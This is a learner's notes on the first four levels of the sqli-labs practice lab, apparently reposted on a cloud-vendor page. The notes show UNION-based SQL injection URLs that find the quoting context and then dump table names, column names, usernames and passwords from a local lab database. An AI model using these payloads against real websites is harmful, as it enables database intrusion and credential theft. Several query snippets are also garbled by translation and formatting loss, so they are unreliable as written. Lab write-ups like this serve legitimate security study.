"Sqli-labs" Less1~less4

Source: Internet
Author: User

Learn SQL injection, a bit of my notes when I do sqli-labs. There may be errors, if someone finds out welcome.

Common knowledge points:

There are three types of 1.mysql annotations: ①#: Comments from # to end of line

②--Space: Comment To line end, note--must have a space after

③/**/: Comments/* to */contents

2. Querying the user database name

Select  from Information_schema. SCHEMA 0,1

3. Querying the current database table

Select  from where Table_schema=(selectDATABASE0,1

4. Querying all fields of the specified table

Select  from where table_name='xxx'0,1

5. Joint queries

Select  from Union Select 1,2,3

6. Group_concat multiple rows of results into a single line

Select group_concat (userfromtable01

Use Group_concat to put multiple results into one line. This allows all information to be displayed if there is only one display bit

7. Combine multiple fields into one field concat

Select  from Table

Less-1: Error message, single quote

Base statement: http://127.0.0.1/sqli-labs/Less-1/?id=

1. Test if the ID type is a string, using single quotes ' test

http://127.0.0.1/sqli-labs/less-1/?id= '

Tip: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1

"', stating ID is a string type

2. There are several fields in the test query, with union, the test has 3 paragraphs, and 2, 3 segments will show

http//127.0.0.1/Sqli-Labs/Less-1/? id='Union Select--A
http//127.0.0.1/Sqli-Labs/Less-1/? id=% -%20Union%20Select%201,2,3% ---%20a

3. Querying data in a database

① Querying all table information in a database

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1,GROUP_CONCAT (table_name), 3 from INFORMATION_SCHEMA. TABLES WHERE table_schema= (select DATABASE ()) LIMIT 0,1--a

Results: Your Login name:emails,referers,uagents,users

Description There are four sheets

② view all fields in the Users table

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1, Group_concat (column_name), 3 from INFORMATION_SCHEMA. COLUMNS WHERE table_name='users'  LIMIT 0,1--a

Results: Your Login Name:id,username,password

③ Querying all user name passwords

http://127.0. 0.1 /sqli-Labs/less-1/? id='  Union Select 1, group_concat (username), Group_concat (password) from users LIMIT 0,1--a

Results:

Your Login Name:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:dumb,i-kill-you,[email Protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo , Admin4

Questions:

Why does the annotation use-a can, use # can not?

Less-2: Error, Integer

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-2/? id='

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1

Error only ' LIMIT 0, 1, description ID is numeric, no other quotes wrapped

② queries all usernames and passwords and joins order by to ensure that all content is displayed. The middle step is the same as the first question, skipping.

http//127.0.0.1/Sqli-Labs/Less-2/? id=3 Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER  byID LIMIT0,1 --a

Less-3: Error, interfering string

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-3/? id='

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' ") LIMIT 0,1 ' at line 1

The difference with the first question is that the ID is followed by a parenthesis, and it can be inferred that the ID is in the format of id = (' 3 '). So when you construct SQL, you have to pay attention to closing the parentheses in addition to closing the quotes.

② querying all user names and passwords

http://127.0. 0.1 /sqli-Labs/less-3/? id=3' ) Union Select 1, Group_concat (username), Group_concat (password) from the users ORDER by ID LIMIT 0,1--a

Less-4: Error, double quote

① Test ID Type

http://127.0. 0.1 /sqli-Labs/less-4/? id='

Results normal output, continue to test, here lazy, according to the name of the direct test double quotation marks

http://127.0. 0.1 /sqli-Labs/less-4/? id= "

Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' "") LIMIT 0,1 ' on line 1

The description ID is a string and is written as ID = ("3")

② get all user name passwords, close double quotes and parentheses

http//127.0.0.1/Sqli-Labs/Less-4/? id=3")Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER  byID LIMIT0,1 --a

"Sqli-labs" Less1~less4

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.